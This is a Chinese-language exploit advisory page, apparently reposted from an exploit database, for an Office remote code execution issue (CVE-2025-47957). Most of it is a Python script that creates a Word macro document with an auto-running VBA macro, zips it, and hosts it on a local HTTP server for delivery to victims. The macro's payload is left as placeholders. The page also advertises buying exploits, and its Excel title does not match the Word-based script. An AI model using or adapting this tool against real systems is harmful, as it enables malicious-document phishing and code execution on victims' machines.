Microsoft Excel LTSC 2024 Remote Code Execution
2025.07.31
信用来源: nu11secur1ty
风险等级:
高危
本地利用: 否
远程利用: 是
CVE编号: CVE-2025-27751 | CVE-2025-47957
CWE编号: N/A
标题: Microsoft Excel LTSC 2024 - 远程代码执行(RCE)
作者: nu11secur1ty
日期: 2025年06月16日
供应商: Microsoft
CVE-2025-47957
受影响版本: Microsoft Office LTSC 2024 、 Microsoft Office LTSC 2021、 Microsoft 365 Apps for Enterprise
漏洞描述:
攻击者可以通过电子邮件或流媒体服务器发送恶意的DOCX文件,诱骗任何用户打开并执行其代码。受害者执行后,其计算机可能被感染,甚至情况可能比以往任何时候都更糟;这可能是其Windows机器的终结!警告:请从您的Office 365中禁用宏选项!!!
状态: 高危-严重漏洞
[+]漏洞利用代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
|
#!/usr/bin/python
# CVE-2025-47957 by nu11secur1ty
import os
import time
import zipfile
import threading
import http.server
import socket
import socketserver
import win32com.client
def get_local_ip():
"""获取当前机器的局域网IP地址。"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80)) # 外部DNS,仅用于路由
ip = s.getsockname()[0]
s.close()
return ip
except:
return "127.0.0.1"
def create_docm_with_auto_macro(filename):
script_dir = os.path.dirname(os.path.abspath(__file__))
full_path = os.path.join(script_dir, filename)
word = win32com.client.Dispatch("Word.Application")
word.Visible = False
doc = word.Documents.Add()
doc.Content.Text = "此文档包含一个自动启动的宏。"
vbproject = doc.VBProject
vbcomponent = vbproject.VBComponents.Add(1) # 标准模块
macro_code = '''
Sub AutoOpen()
Call YOUR_PoC
End Sub
Sub YOUR_PoC()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "YOUR_EXPLOIT_HERE"
TaskID = YOUR_TASK_HERE
If Err <> 0 Then
MsgBox "无法启动 " & Program
End If
End Sub
'''
vbcomponent.CodeModule.AddFromString(macro_code)
wdFormatXMLDocumentMacroEnabled = 13
doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
doc.Close()
word.Quit()
print(f"[+] 启用宏的.docm文件已保存至: {full_path}")
return full_path
def compress_to_zip(filepath):
zip_path = filepath + '.zip'
with zipfile.ZipFile(zip_path, 'w') as zipf:
zipf.write(filepath, arcname=os.path.basename(filepath))
print(f"[+] 已压缩为ZIP文件: {zip_path}")
return zip_path
def start_http_server(directory, port=8000):
os.chdir(directory)
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", port), handler)
ip = get_local_ip()
print(f"[+] HTTP服务器运行于: http://{ip}:{port}/")
thread = threading.Thread(target=httpd.serve_forever)
thread.daemon = True
thread.start()
return httpd
if __name__ == "__main__":
filename = "CVE-2025-47957.docm"
docm_path = create_docm_with_auto_macro(filename)
zip_path = compress_to_zip(docm_path)
server = start_http_server(os.path.dirname(docm_path))
try:
print("[*] 服务器运行中 —— 按 Ctrl+C 停止...")
while True:
time.sleep(1)
except KeyboardInterrupt:
print("\n[!] 检测到 Ctrl+C —— 正在关闭服务器...")
server.shutdown()
print("[+] 漏洞利用服务器已停止。再见!")
|
复现链接:
href
购买漏洞利用(仅限):
href
花费时间:
01:37:00
–
系统管理员 - 基础设施工程师
渗透测试工程师
漏洞利用开发人员,工作于 https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ 与 https://www.exploit-db.com/
0day漏洞利用数据库 https://0day.today/
主页: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/
–
系统管理员 - 基础设施工程师
渗透测试工程师
漏洞利用开发人员,工作于 https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ 与 https://www.exploit-db.com/
0day漏洞利用数据库 https://0day.today/
主页: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/